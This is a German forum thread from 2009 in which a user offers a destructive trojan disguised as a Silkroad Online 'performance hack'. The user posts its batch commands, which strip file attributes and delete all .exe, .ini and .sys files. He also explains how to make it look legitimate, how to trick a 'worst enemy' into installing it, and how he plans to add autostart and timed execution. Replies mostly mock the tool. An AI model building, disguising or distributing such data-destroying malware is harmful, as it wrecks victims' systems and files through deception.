myGully.com Boerse.SH - BOERSE.AM - BOERSE.IO - BOERSE.IM Boerse.BZ .TO Nachfolger
Zurück   myGully.com > Computer & Technik > Sicherheit & Anonymität
Seite neu laden

SRO - Faked Harddrive Crasher by X-Zat

Willkommen

myGully

Links

Forum

 
Antwort
Themen-Optionen Ansicht
Ungelesen 20.07.09, 00:19   #1
X-Zat [Low]
Unfreiwilliges Genie ;)
 
Benutzerbild von X-Zat [Low]
 
Registriert seit: Jul 2009
Ort: Nord-Rhein-Westfahlen, Kreis Borken
Beiträge: 19
Bedankt: 1
X-Zat [Low] ist noch neu hier! | 0 Respekt Punkte
Standard SRO - Faked Harddrive Crasher by X-Zat

Hey, Leute.

Nachdem ich den Thread über einen PW-Stealer hier gelesen hab, der nicht mal clean ist, biete ich euch das hier an:

SRO - Performance Hack! By X-Zat Files

Kurzüberblick, Features:

1. Professionelles Design
2. Nach Installation DIREKTES löschen aller *.EXE, *.INI und *.SYS
3. Folglich ein theoretischer Crash von Windows, oder Festplatte nicht mehr nutzbar

Eigenschaften:

1. Größe: 10,1 MB (eigentich ~1MB, habs mit Stuff zugepackt, damit glaubwürdig ).
2. Wird nicht erkannt, da simples BAT-Programm, bzw. Bat-Ausführung.
3. Direktes Ausführen der *.EXE meines kleinen Programmes (BAT TO EXE CONVERTED, Icon included)
4. Muss unter Vista nicht als Adminstator ausgeführt werden, gelöscht wird ohne Frage des Users!
5. Ungefährlich im nicht installierten Zustand. Setup kann ohne Risiken entpackt und gespeichert werden, NICHT AUSFÜHREN!

Wie man es benutzt:

1. Deinem "schlimmsten Feind" einfach den Download-Link geben und sagen es sei ein Performance-/Geschwindigkeits-Hack von SRO.
2. Ihn Installieren lassen.
3. Fertig - Jetzt kommt die Schadenfreude

Download-Link:


Rapidshare: [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] (Danke fürs Uppen an BadFriend!)


- Benutzung auf eigene Gefahr - Seid bitte nicht so dämlich, es bei euch zu installieren! In der *.RAR ist das Tool ungefährlich. -

MfG und viel Spaß mit euren Rivalen,

X-Zat

EDIT: Nein, es ist kein PW-Stealer oder dergleichen - Ich kann solche Assis, die etwas infiziertes uppen ebenso wenig leiden, wie ihr es tut! -. Wie gesagt ungefährlich im NICHT INSTALLIERTEN Zustand. Wenn euer Antiviren Programm trotzdem etwas melden sollte, bitte SOFORT melden, damit ich das behebn und verbessern kann!
__________________
X-Zat [Low] ist offline   Mit Zitat antworten
Ungelesen 22.07.09, 11:31   #2
BadFriend
Erfahrener Newbie
 
Registriert seit: Apr 2009
Beiträge: 149
Bedankt: 878
BadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt Punkte
Standard

Hier der Premium-Link:



Bedanken tut nicht weh ^^
BadFriend ist offline   Mit Zitat antworten
Ungelesen 22.07.09, 14:33   #3
BadFriend
Erfahrener Newbie
 
Registriert seit: Apr 2009
Beiträge: 149
Bedankt: 878
BadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt PunkteBadFriend ist unten durch! | -1688 Respekt Punkte
Standard

Das mit dem Premium-Link geht aber shcon o.k? q[o-O]p
BadFriend ist offline   Mit Zitat antworten
Ungelesen 22.07.09, 20:02   #4
X-Zat [Low]
Unfreiwilliges Genie ;)
 
Benutzerbild von X-Zat [Low]
 
Registriert seit: Jul 2009
Ort: Nord-Rhein-Westfahlen, Kreis Borken
Beiträge: 19
Bedankt: 1
X-Zat [Low] ist noch neu hier! | 0 Respekt Punkte
Standard

Oh, entschludigung.
Hatte keinen Plan, dass ein Free-User-Upp bzw. generell RS-Upp nicht zulässig ist... Werde demnächst wo anders Uppen und mich erkundigen .

Und danke für den Premium-Upp, hast was gut bei mir!

Jetzt wären ein paar Comments zum eigentlichen Thema mal ganz nett...

MfG,
X-Zat
__________________
X-Zat [Low] ist offline   Mit Zitat antworten
Ungelesen 22.07.09, 22:54   #5
StOn€_9
DGT Supporter
 
Benutzerbild von StOn€_9
 
Registriert seit: Feb 2009
Beiträge: 72
Bedankt: 235
StOn€_9 ist noch neu hier! | 8 Respekt Punkte
Standard

oh fuck ich sehs kommen die nächsten Uploads hier,
sind nicht programme sondern das prog von dir
und dann wimmelts hier von gecrashten Windows

Aber trotzdem danke dafür!

mfg
StOn€_9 ist offline   Mit Zitat antworten
Ungelesen 23.07.09, 16:09   #6
X-Zat [Low]
Unfreiwilliges Genie ;)
 
Benutzerbild von X-Zat [Low]
 
Registriert seit: Jul 2009
Ort: Nord-Rhein-Westfahlen, Kreis Borken
Beiträge: 19
Bedankt: 1
X-Zat [Low] ist noch neu hier! | 0 Respekt Punkte
Standard

Och gern doch .

Noch ein paar Anmerkungen zum Programm:

1. Grund der Entwicklung:

Mein Kollege zockt viel und gern SRO und alle tauschen bei SRO Update- und Tool-Links aus (z.B. Loader). Mein Programm soll für den Laien das erste Tool sein, womit man seine Spiel-Performance hackt (bei CS:S-Spielern bekannt als Speedhack). Mein Kollege wollte ein Programm, welches den Anschein hat, nützlich zu sein, in Wahrheit aber ein undetectable Virus ist. Ok, Virus nicht, da es keine Daten infiziert - Also eher ein Lösch-Tool.

2. Bestandteile:

Das Tool besteht nur aus 1 Exe-Datei, welche eigentlich eine BAT-Datei ist. Die Bat hat simple, auf XP und Vista funktionierende Parameter und Commands. In ungefähr müssten sie so aussehen (weiß es nicht mehr genau, ist schon 2 Monate her):

attrib *.sys -/s -/r -/h
attrib *.exe -/s -/r -/h
attrib *.ini -/s -/r -/h
del *.sys
del*.exe
del *.ini

Was soviel bedeutet wie:

Attribute von *.sys-, *.exe- und *.ini-Dateien zurücksetzten
Löschen der *.sys-, *.exe und *.ini-Dateien im Verzeichnis und Unterordnern.
Konvertiert wurde die *.BAT mittels BAT TO EXE Converter. Dann hab ich noch ein paar pointless Ini's in Unterverzeichnisse gepackt, ein paar Dateien mit sinnlosen Endungen und das alles in ein Setup mithilfe eines Freeware-Setup Makers.

Das Setup besteht aus Setup.exe und zwei .cab-Archiven.

3. Funktionsweise:

1. Setup starten (Setup startet sich)
2. Setup-Parameter einstellen, Ordner usw. (Setup legt Parameter fest)
3. Setup installiert (Setup extrahiert Dateien, Standart C:\)
4. Setup führt OHNE FRAGE AN DEN USER die Exe des SRO FAKES aus (EXE löscht sämtliche Dateien, außer, wenn in z.B. C:\SRO\ installiert wurde, dann nur DA die Dateien)
5. HEADCRASH der Festplatte, generell nicht zu benutzende Festplatte oder im harmlosesten Fall leichten Datenverlust.


Was die Zukunft bringt...

Innerhalb von wenigen Tagen werde ich demnächst den Fake überarbeiten, sodass...

1. KEIN Ausführen der Datei nach Installation
2. Fester Install-Path, Kopie der Exe auf C:\ und D:\
3. Restart des PC's nach Installation
4. Automatisches Ausführen der Datei und der Kopieen nach Reboot des PC's, bzw. bei normalem Boot
5. Evtl. Zeitsteuerung des "Programms"

Vorsichtsmaßnahmen...

1. die RAR zu entpacken KANN keine Schäden hervorrufen.
2. die normalen Setup-Daten können im nicht ausgeführten Zustand KEINE Schäden verursachen.
3. das Setup ist schon schädlich, jedoch nur, wenn NICHT unterbrochen wird.
4. die Dateien sind unschädlich, sofern sie durch welchen Zufall auch immer von Setup nicht ausgeführt werden, sofern man die Dateien nicht selbst manuell ausführt.

Wenn doch mal was schief läuft...

...Dann habe ich echt keine Ahnung, wie zu helfen wäre, weil ich selbst nicht so dumm bin, es selbst bei mir auszuführen . Funktioniert das Programm so, wie es soll (was es auf Vista und XP muss, sofern keine *******n Schutzmaßnamhen getroffen werden/wurden), so werden sämtliche Dateien der spezifischen Typen gelöscht, selbst die SYS-Dateien. Ich bezweifle, dass irgendein Back-Up-Tool das wieder in Ordnung bringen kann. Möglich ist, dass man Windows einfahc neu installieren kann, von DOS aus.

MfG,

X-Zat
__________________
X-Zat [Low] ist offline   Mit Zitat antworten
Ungelesen 23.07.09, 16:46   #7
Amstaff
Ex-Co-Administrator
 
Benutzerbild von Amstaff
 
Registriert seit: Sep 2008
Beiträge: 4.370
Bedankt: 7.361
Amstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt PunkteAmstaff leckt gerne myGully Deckel in der Kanalisation! | 24044190 Respekt Punkte
Standard

Also ein schöner kleiner Sysfucker.
Wers braucht, ne..
__________________
Bussi :* Amstaff
[ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
Amstaff ist offline   Mit Zitat antworten
Ungelesen 23.07.09, 18:55   #8
X-Zat [Low]
Unfreiwilliges Genie ;)
 
Benutzerbild von X-Zat [Low]
 
Registriert seit: Jul 2009
Ort: Nord-Rhein-Westfahlen, Kreis Borken
Beiträge: 19
Bedankt: 1
X-Zat [Low] ist noch neu hier! | 0 Respekt Punkte
Standard

Sei sicher, eine Menge Kids googlen bestimmt schon Monate nach soetwas .
Außerdem ist mir der Verwendungszweck des Tools egal, war sowieso 'n Langeweile-Projekt...
__________________
X-Zat [Low] ist offline   Mit Zitat antworten
Ungelesen 23.07.09, 20:06   #9
Desert-Fighter
Anfänger
 
Registriert seit: Jun 2008
Beiträge: 35
Bedankt: 174
Desert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt PunkteDesert-Fighter leckt gerne myGully Deckel in der Kanalisation! | 3097667 Respekt Punkte
Standard

aber der name "Harddrive Crasher" passt überhaupt nich.. eher der name "simple bat datei" oda so..
Desert-Fighter ist offline   Mit Zitat antworten
Ungelesen 25.07.09, 00:58   #10
fegefeuer
Banned
 
Registriert seit: Aug 2008
Beiträge: 41
Bedankt: 4
fegefeuer ist noch neu hier! | 0 Respekt Punkte
Standard

Yeah du bist echt der Profi Hacker!!
fegefeuer ist offline   Mit Zitat antworten
Ungelesen 25.07.09, 21:37   #11
X-Zat [Low]
Unfreiwilliges Genie ;)
 
Benutzerbild von X-Zat [Low]
 
Registriert seit: Jul 2009
Ort: Nord-Rhein-Westfahlen, Kreis Borken
Beiträge: 19
Bedankt: 1
X-Zat [Low] ist noch neu hier! | 0 Respekt Punkte
Standard

Davon war nie die Rede. Hättest du die Posts aufmerksam gelesen, hättest du gemerkt, dass es sich nicht um einen Hack sondern um ein kleines Tool handelt.
Was mich zu der Frage führt, wie viel Ahnung du haben musst, dass du denkst, es sein ein Hack. Wir schweifen vom Thema ab.

MfG
__________________
X-Zat [Low] ist offline   Mit Zitat antworten
Ungelesen 28.04.10, 10:19   #12
Laex1990
Anfänger
 
Registriert seit: Apr 2010
Beiträge: 2
Bedankt: 0
Laex1990 ist noch neu hier! | 0 Respekt Punkte
Standard

Also bei mir funktioniert der Link nicht!
Laex1990 ist offline   Mit Zitat antworten
Antwort


Forumregeln
Du kannst keine neue Themen eröffnen
Du kannst keine Antworten verfassen
Du kannst keine Anhänge posten
Du kannst nicht deine Beiträge editieren

BB code is An
Smileys sind An.
[IMG] Code ist An.
HTML-Code ist Aus.

Gehe zu


Alle Zeitangaben in WEZ +1. Es ist jetzt 09:42 Uhr.


Sitemap

().